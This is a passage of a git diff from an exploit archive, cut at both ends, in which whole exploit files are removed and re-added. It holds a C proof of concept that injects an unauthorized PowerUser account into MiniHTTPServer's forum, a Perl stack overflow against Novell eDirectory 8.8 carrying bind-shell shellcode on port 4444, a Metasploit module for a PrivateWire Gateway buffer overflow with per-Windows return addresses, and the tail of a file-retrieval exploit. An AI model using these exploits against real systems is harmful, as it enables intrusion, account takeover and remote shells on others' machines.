strlen(request)); + check = 0; + httpbuf = malloc(2); + memset(httpbuf,0,2); + while(check == 0) + { + p = BIO_read(bio, r, 1); + r[p] = 0; + httpbuf2 = malloc(strlen(r) + strlen(httpbuf) + 1); + sprintf(httpbuf2,"%s%s",httpbuf,r); + free(httpbuf); + httpbuf = httpbuf2; + check = (int)strstr(httpbuf,"\n\n"); + } + printf("[ Displaying raw HTTP response details\n"); + printf("%s",httpbuf); + check = 0; + check = (int)strstr(httpbuf,"200 OK"); + if(check != 0) + { + printf("[ Exploit success, file found\n"); + fd = open(file,O_RDWR|O_CREAT,S_IRWXU); + if(fd == -1){ + printf("[ Error creating %s",file); + exit(0); + } + for(;;) + { + p = BIO_read(bio, r, 1023); + if(p <= 0) break; + r[p] = 0; + write(fd,r,p); + size = size + p; + } + printf("[ Recieved %u byte(s) and saved as '%s'\n",size,file); + close(fd); + } + if(check==0) + { + check = (int)strstr(httpbuf,"301 Moved"); + if(check != 0) + { + printf("[ Exploit success, directory found\n"); + } + } + free(httpbuf); + if(check == 0) + { + printf("[ Exploit failed\n"); + } + 
BIO_free_all(bio);
+ SSL_CTX_free(ctx);
+ return 0;
+}
+
+// milw0rm.com [2006-10-24]
diff --git a/platforms/windows/remote/2651.c b/platforms/windows/remote/2651.c
index d531a9b7d..f609ee1c8 100755
--- a/platforms/windows/remote/2651.c
+++ b/platforms/windows/remote/2651.c
@@ -1,146 +1,146 @@ -/*================================================================ - -MiniHTTPServer.NET 's Web Forum & File Sharing Server Power Pack 4 -(latest version available for sale on their website -http://www.minihttpserver.net/bbs/index.php ) has multiple -vulnerabilities with their join.asp page a malicious person could send manipulated data -within the 'FrmMailBox' or 'FrmUserPass' field to add an unverified -account to the system's user database or to manipulate existing users. - -This obviously could lead to information leaks on the server, -sensitive information disclosure, or even system access and -compromise. - -Discovered 10-25-2006 by Greg Linares -Compiled in LCC-Win32 - -==================================================================*/ - - - -#include -#include -#include -#include -#include -#pragma comment(lib, "ws2_32") - -#define MAXBUF 1024 - -int main(int argc, char *argv[]) -{ - /* make sure this lowercase only username here is unique to the server - else exploit fails */ - - unsigned char ExploitStart[] = - "/join.asp?frmUserID=uniquerandomusername&frmUserPass=pwd1234&frmMailBox=me@blah.net"; - - - - - unsigned char Exploit[] = - "\x3c\x2f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e\x3c" - "\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x31\x32\x33\x34" - "\x3c\x2f\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x3c" - "\x41\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e" - "\x50\x6f\x77\x65\x72\x55\x73\x65\x72\x3c\x2f\x41" - "\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e\x3c" - "\x45\x6d\x61\x69\x6c\x3e\x61\x40\x68\x65\x72\x65" - "\x2e\x6e\x65\x74"; - - WSADATA wsaData; - char *hostname; - struct hostent *hp; - int sockfd, bytes_read; - struct sockaddr_in sockin; - char buffer[MAXBUF]; - char Exp[MAXBUF]; - - printf("\n=================================================================================\n"); - printf("0-day MiniHTTPServer Web Forum & File Sharing Server 4.0 Add PowerUser Vulnerability \n"); - printf("Proof Of Concept Code and Discovery by Greg 
Linares \n", argv[0]); - exit(0); - } - - - hostname = argv[1]; - if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) - { - fprintf(stderr, "Error setting up with WinSock v1.1\n"); - exit(-1); - } - - - - hp = gethostbyname(hostname); - if (hp == NULL) - { - printf("ERROR: Uknown host %s\n", hostname); - printf("%s",hostname); - exit(-1); - } - - sockin.sin_family = AF_INET; - sockin.sin_port = htons(80); - sockin.sin_addr = *((struct in_addr *)hp->h_addr); - - if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) - { - printf("ERROR: Socket Error\n"); - exit(-1); - } - - if ((connect(sockfd, (struct sockaddr *) &sockin, - sizeof(sockin))) == SOCKET_ERROR) - { - printf("ERROR: Connect Error\n"); - closesocket(sockfd); - WSACleanup(); - exit(-1); - } - - printf("Connected to [%s] on port [80], sending overflow....\n\n\n", - hostname); - - - - memset(Exp, 0, 1024); - strcat(Exp, ExploitStart); - /* you can add more \r to create blank lines in the userlist (harder to read) */ - strcat(Exp, "\r"); - strcat(Exp, "\x3c\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e"); - strcat(Exp, strlwr(argv[2])); - strcat(Exp, Exploit); - - - memset(buffer, 0, 1024); - sprintf(buffer, "GET %s HTTP/1.0\n\n", Exp); - send(sockfd, buffer, strlen(buffer), 0); - - /* - You can re-add this if you want to see the HTTP Response - do - { - - bytes_read = recv(sockfd, buffer, sizeof(buffer), 0); - if ( bytes_read > 0 ) - printf("%s", buffer); - } - while ( bytes_read > 0 ); - */ - - printf("Exploit Sent to [%s] \n Login with Username: %s (lowercase) \n Password: 1234\n", hostname, strlwr(argv[2])); - printf("Any Questions/Comments/Concerns ==> GLinares.Code [at] Gmail [dot] com\n"); - WSACleanup(); - return 0; -} - -// milw0rm.com [2006-10-25] +/*================================================================ + +MiniHTTPServer.NET 's Web Forum & File Sharing Server Power Pack 4 +(latest version available for sale on their website +http://www.minihttpserver.net/bbs/index.php ) has multiple 
+vulnerabilities with their join.asp page a malicious person could send manipulated data +within the 'FrmMailBox' or 'FrmUserPass' field to add an unverified +account to the system's user database or to manipulate existing users. + +This obviously could lead to information leaks on the server, +sensitive information disclosure, or even system access and +compromise. + +Discovered 10-25-2006 by Greg Linares +Compiled in LCC-Win32 + +==================================================================*/ + + + +#include +#include +#include +#include +#include +#pragma comment(lib, "ws2_32") + +#define MAXBUF 1024 + +int main(int argc, char *argv[]) +{ + /* make sure this lowercase only username here is unique to the server - else exploit fails */ + + unsigned char ExploitStart[] = + "/join.asp?frmUserID=uniquerandomusername&frmUserPass=pwd1234&frmMailBox=me@blah.net"; + + + + + unsigned char Exploit[] = + "\x3c\x2f\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e\x3c" + "\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x31\x32\x33\x34" + "\x3c\x2f\x50\x61\x73\x73\x77\x6f\x72\x64\x3e\x3c" + "\x41\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e" + "\x50\x6f\x77\x65\x72\x55\x73\x65\x72\x3c\x2f\x41" + "\x63\x63\x65\x73\x73\x72\x69\x67\x68\x74\x3e\x3c" + "\x45\x6d\x61\x69\x6c\x3e\x61\x40\x68\x65\x72\x65" + "\x2e\x6e\x65\x74"; + + WSADATA wsaData; + char *hostname; + struct hostent *hp; + int sockfd, bytes_read; + struct sockaddr_in sockin; + char buffer[MAXBUF]; + char Exp[MAXBUF]; + + printf("\n=================================================================================\n"); + printf("0-day MiniHTTPServer Web Forum & File Sharing Server 4.0 Add PowerUser Vulnerability \n"); + printf("Proof Of Concept Code and Discovery by Greg Linares \n", argv[0]); + exit(0); + } + + + hostname = argv[1]; + if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) + { + fprintf(stderr, "Error setting up with WinSock v1.1\n"); + exit(-1); + } + + + + hp = gethostbyname(hostname); + if (hp == NULL) + { + printf("ERROR: Uknown 
host %s\n", hostname);
+ printf("%s",hostname);
+ exit(-1);
+ }
+
+ sockin.sin_family = AF_INET;
+ sockin.sin_port = htons(80);
+ sockin.sin_addr = *((struct in_addr *)hp->h_addr);
+
+ if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
+ {
+ printf("ERROR: Socket Error\n");
+ exit(-1);
+ }
+
+ if ((connect(sockfd, (struct sockaddr *) &sockin,
+ sizeof(sockin))) == SOCKET_ERROR)
+ {
+ printf("ERROR: Connect Error\n");
+ closesocket(sockfd);
+ WSACleanup();
+ exit(-1);
+ }
+
+ printf("Connected to [%s] on port [80], sending overflow....\n\n\n",
+ hostname);
+
+
+
+ memset(Exp, 0, 1024);
+ strcat(Exp, ExploitStart);
+ /* you can add more \r to create blank lines in the userlist (harder to read) */
+ strcat(Exp, "\r");
+ strcat(Exp, "\x3c\x55\x73\x65\x72\x6e\x61\x6d\x65\x3e");
+ strcat(Exp, strlwr(argv[2]));
+ strcat(Exp, Exploit);
+
+
+ memset(buffer, 0, 1024);
+ sprintf(buffer, "GET %s HTTP/1.0\n\n", Exp);
+ send(sockfd, buffer, strlen(buffer), 0);
+
+ /*
+ You can re-add this if you want to see the HTTP Response
+ do
+ {
+
+ bytes_read = recv(sockfd, buffer, sizeof(buffer), 0);
+ if ( bytes_read > 0 )
+ printf("%s", buffer);
+ }
+ while ( bytes_read > 0 );
+ */
+
+ printf("Exploit Sent to [%s] \n Login with Username: %s (lowercase) \n Password: 1234\n", hostname, strlwr(argv[2]));
+ printf("Any Questions/Comments/Concerns ==> GLinares.Code [at] Gmail [dot] com\n");
+ WSACleanup();
+ return 0;
+}
+
+// milw0rm.com [2006-10-25]
diff --git a/platforms/windows/remote/266.c b/platforms/windows/remote/266.c
index 848c8d452..c4cadb1c4 100755
--- a/platforms/windows/remote/266.c
+++ b/platforms/windows/remote/266.c
@@ -177,6 +177,6 @@ void usage()
 printf("Example: iishack2000 127.0.0.1 80 1\n");
 exit(1);
 }
-
-
-// milw0rm.com [2001-05-07]
+
+
+// milw0rm.com [2001-05-07]
diff --git a/platforms/windows/remote/2671.pl b/platforms/windows/remote/2671.pl
index 7e58f5daf..fc9910b3e 100755
--- a/platforms/windows/remote/2671.pl
+++ b/platforms/windows/remote/2671.pl
@@ -1,100 +1,100 @@ -#!perl -# -# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit -# -# Author: Manuel Santamarina Suarez -# e-Mail: FistFuXXer@gmx.de -# - -use IO::Socket; - -# -# destination IP address -# -$ip = '192.168.1.25'; - -# -# destination TCP port -# -$port = 8028; - -# -# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free -# -$ret = reverse( "\x5F\x83\x3B\x7A" ); # CALL ESP - # MFC42U.5f833b7a - -# -# 0x00, 0x0a, 0x0d, 0x3a free shellcode -# -# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com -# -$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". - "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". - "\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57". - "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48". - "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38". - "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c". - "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". - "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48". - "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54". - "\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38". - "\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d". - "\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58". - "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36". - "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46". - "\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47". - "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". 
- "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e". - "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30". - "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". - "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54". - "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31". - "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a". - "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41". - "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42". - "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d". - "\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d". - "\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36". - "\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45". - "\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36". - "\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c". - "\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c". - "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52". - "\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". - "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f". - "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46". - "\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46". - "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56". - "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f". - "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". - "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d". - "\x4f\x4f\x42\x4d\x5a"; - -print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n"; - -$sock = IO::Socket::INET->new -( - - PeerAddr => $ip, - PeerPort => $port, - Proto => 'tcp', - Timeout => 2 - -) or print '[-] Error: Could not establish a connection to the server!' 
and exit(1); - -print "[+] Connected.\n"; -print "[+] Trying to overwrite RETurn address...\n"; - -$sock->send( "GET /nds HTTP/1.1\r\n" ); -$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" ); - -print "[+] Done. Now check for bind shell on $ip:4444!"; - -close( $sock ); - -# milw0rm.com [2006-10-28] +#!perl +# +# "Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit +# +# Author: Manuel Santamarina Suarez +# e-Mail: FistFuXXer@gmx.de +# + +use IO::Socket; + +# +# destination IP address +# +$ip = '192.168.1.25'; + +# +# destination TCP port +# +$port = 8028; + +# +# RETurn address. 0x00, 0x0a, 0x0d, 0x3a free +# +$ret = reverse( "\x5F\x83\x3B\x7A" ); # CALL ESP + # MFC42U.5f833b7a + +# +# 0x00, 0x0a, 0x0d, 0x3a free shellcode +# +# win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com +# +$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e". + "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38". + "\x4e\x56\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x48\x4e\x57". + "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x48". + "\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x38". + "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c". + "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e". + "\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x57\x45\x4e\x4b\x48". + "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54". + "\x4b\x58\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x38". + "\x49\x38\x4e\x46\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d". + "\x46\x36\x4b\x58\x43\x44\x42\x33\x4b\x48\x42\x44\x4e\x50\x4b\x58". 
+ "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x36". + "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46". + "\x43\x35\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x46\x47\x57\x43\x47". + "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e". + "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e". + "\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x46\x44\x30". + "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45". + "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x35\x43\x54". + "\x43\x45\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x41\x31". + "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x36\x46\x4a". + "\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41". + "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x42". + "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d". + "\x4a\x46\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x35\x4f\x4f\x48\x4d". + "\x42\x55\x46\x55\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x36". + "\x47\x4e\x49\x37\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x45". + "\x4f\x4f\x42\x4d\x48\x36\x4c\x36\x46\x56\x48\x46\x4a\x56\x43\x36". + "\x4d\x46\x49\x38\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c". + "\x49\x58\x47\x4e\x4c\x56\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c". + "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x52\x50\x4f\x44\x54\x4e\x52". + "\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36". + "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f". + "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x55\x41\x35\x41\x55\x4c\x46". + "\x41\x50\x41\x45\x41\x55\x45\x45\x41\x35\x4f\x4f\x42\x4d\x4a\x46". + "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x56". + "\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f". + "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d". + "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d". 
+ "\x4f\x4f\x42\x4d\x5a";
+
+print '"Novell eDirectory 8.8 NDS Server" Remote Stack Overflow Exploit'."\n\n";
+
+$sock = IO::Socket::INET->new
+(
+
+ PeerAddr => $ip,
+ PeerPort => $port,
+ Proto => 'tcp',
+ Timeout => 2
+
+) or print '[-] Error: Could not establish a connection to the server!' and exit(1);
+
+print "[+] Connected.\n";
+print "[+] Trying to overwrite RETurn address...\n";
+
+$sock->send( "GET /nds HTTP/1.1\r\n" );
+$sock->send( 'Host: ' . 'SEXY' x 17 . $ret . $sc . "\r\n\r\n" );
+
+print "[+] Done. Now check for bind shell on $ip:4444!";
+
+close( $sock );
+
+# milw0rm.com [2006-10-28]
diff --git a/platforms/windows/remote/268.c b/platforms/windows/remote/268.c
index 3f2821ef8..189ecfecb 100755
--- a/platforms/windows/remote/268.c
+++ b/platforms/windows/remote/268.c
@@ -164,6 +164,6 @@ unsigned char sploit[]=
 printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
 exit(0);
 }
-
-
-// milw0rm.com [2001-05-08]
+
+
+// milw0rm.com [2001-05-08]
diff --git a/platforms/windows/remote/2680.pm b/platforms/windows/remote/2680.pm
index de9e699c1..d3588db6c 100755
--- a/platforms/windows/remote/2680.pm
+++ b/platforms/windows/remote/2680.pm
@@ -1,124 +1,124 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -## -# From the author: -# This file may only be distributed as part of the Metasploit Framework. -# Any other use needs a written permission from the author. -## - -package Msf::Exploit::privatewire_gateway_win32; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Private Wire Gateway Buffer Overflow (win32)', - 'Version' => '$Rev$', - 'Authors' => - [ - 'Michael Thumann ', - ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32' ], - 'Priv' => 1, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 80], - 'PATH' => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'], - }, - - 'Payload' => - { - 'Space' => 8000, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b", - 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 - }, - - 'Description' => Pex::Text::Freeform(qq{ - This exploits a buffer overflow in the ADMCREG.EXE used - in the PrivateWire Online Registration Facility. . 
-}), - - 'Refs' => - [ - ['BID', '18647'], - ], - - 'DefaultTarget' => 4, - 'Targets' => [ - ['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL - ['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL - ['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL - ['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL - ['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL - ['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL - ['Debugging', 0x41414141], # Crash - ], - - 'Keys' => ['privatewire'], - - 'DisclosureDate' => 'June 26 2006', - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $path = $self->GetVar('PATH'); - my $path_offset = length($path)-8; - - my $target = $self->Targets->[$target_idx]; - - my $pattern = Pex::Text::AlphaNumText(8192); - my $jmp = # add 25 to ecx and jmp - "\x6a\x19". - "\x58". - "\x01\xc1". - "\xff\xe1"; - substr($pattern, 0, length($shellcode), $shellcode); - substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1])); - substr($pattern, 8160, length($jmp), $jmp); - - my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n"; - - $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1])); - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - ); - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); - return; - } - - $s->Send($request); - $s->Close(); - return; -} - -1; - -# milw0rm.com [2006-10-29] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +## +# From the author: +# This file may only be distributed as part of the Metasploit Framework. +# Any other use needs a written permission from the author. +## + +package Msf::Exploit::privatewire_gateway_win32; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'Private Wire Gateway Buffer Overflow (win32)', + 'Version' => '$Rev$', + 'Authors' => + [ + 'Michael Thumann ', + ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32' ], + 'Priv' => 1, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 80], + 'PATH' => [1, 'DATA', 'Installation Path of Privatewire','C:\Cipgw'], + }, + + 'Payload' => + { + 'Space' => 8000, + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x1b", + 'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500 + }, + + 'Description' => Pex::Text::Freeform(qq{ + This exploits a buffer overflow in the ADMCREG.EXE used + in the PrivateWire Online Registration Facility. . 
+}), + + 'Refs' => + [ + ['BID', '18647'], + ], + + 'DefaultTarget' => 4, + 'Targets' => [ + ['Windows 2000 English SP0', 0x77e3c289], # jmp esp USER32.DLL + ['Windows 2000 English SP1', 0x77e3cb4c], # jmp esp USER32.DLL + ['Windows 2000 English SP2', 0x77e3af64], # jmp esp USER32.DLL + ['Windows 2000 English SP3', 0x77e388a7], # jmp esp USER32.DLL + ['Windows 2000 English SP4', 0x77e3c256], # jmp esp USER32.DLL + ['Windows 2003 English SP0/SP1', 0x77d74c94], # jmp esp USER32.DLL + ['Debugging', 0x41414141], # Crash + ], + + 'Keys' => ['privatewire'], + + 'DisclosureDate' => 'June 26 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $path = $self->GetVar('PATH'); + my $path_offset = length($path)-8; + + my $target = $self->Targets->[$target_idx]; + + my $pattern = Pex::Text::AlphaNumText(8192); + my $jmp = # add 25 to ecx and jmp + "\x6a\x19". + "\x58". + "\x01\xc1". + "\xff\xe1"; + substr($pattern, 0, length($shellcode), $shellcode); + substr($pattern, 8156- $path_offset, 4, pack('V', $target->[1])); + substr($pattern, 8160, length($jmp), $jmp); + + my $request = "GET /" . $pattern . " HTTP/1.0\r\n\r\n"; + + $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using jmp esp at 0x%.8x...", $target->[1])); + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + ); + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + + $s->Send($request); + $s->Close(); + return; +} + +1; + +# milw0rm.com [2006-10-29] 
diff --git a/platforms/windows/remote/2689.c b/platforms/windows/remote/2689.c
index 20cc5b5d2..e859284c9 100755
--- a/platforms/windows/remote/2689.c
+++ b/platforms/windows/remote/2689.c
